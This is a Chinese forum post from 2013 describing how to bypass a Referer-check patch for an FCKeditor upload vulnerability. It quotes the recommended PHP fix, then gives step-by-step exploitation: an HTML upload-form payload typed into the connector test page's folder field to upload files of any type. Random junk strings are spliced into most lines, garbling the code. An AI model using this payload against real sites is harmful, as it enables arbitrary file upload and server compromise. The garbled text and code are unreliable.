找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2169|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php  j" Q6 _$ V, B3 e- ]
网上给出的修复方案是0 e* @( d0 a0 S9 e2 X4 z
修复方法,删除FCK编辑器用其他的编辑器
6 y: W5 b5 N/ ^) G! y+ d或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
5 |% _4 `3 Q- R+ A# o  E: [- k! o7 A' b2 f. p0 a" R% L8 K3 z- \0 T
require(‘config.php’);
0 I4 k5 W/ f9 Q5 k$ K7 ?require(‘util.php’);8 M7 E; l2 N: _7 @
的下面添加以下代码—————————–
& m6 j  C6 T7 v( S! T+ z0 M* D% ^//防止外部提交
1 ]9 F/ Z! f6 `8 T( K& Q! rfunction outsidepost()
! N5 h9 N+ |# o  Q0 V0 v8 O{" l# v4 s" U! D, ?# C/ n
$servername=$_SERVER['SERVER_NAME'];& ^$ O+ z: D7 C/ Q
$sub_from=@$_SERVER['HTTP_REFERER'];
0 @: @9 f2 A2 P; Q# ?3 ^. l$sub_len=strlen($servername);8 d- Y% Z, r# a
$checkfrom=substr($sub_from,7,$sub_len);$ p, D9 h% g* S, V" j
if($checkfrom!=$servername){
9 P" v' ~6 \; T4 c5 Hecho(“you don’t outsidepost!”);" h3 u. Q7 t* d9 p* b
exit;, _7 m( k. a1 ]
}
6 `& Y" n6 V9 Z4 H}, e# w0 P1 m0 K# J" g
outsidepost();" P6 l3 H( O* z: w( x
防止外部提交,但是没有防止内部提交,
* b0 F* k7 }; O% k' z利用方法:( f0 R) o: w; a/ S$ ^
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
8 N6 z- f% t% h# [+ M, y2,在Current Folder 框输入  e# ?' Y! r: p3 ~7 U( {- O/ g
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>) F6 F& O2 I2 m6 K8 w
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
& p/ l: l$ k$ o8 h. OPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表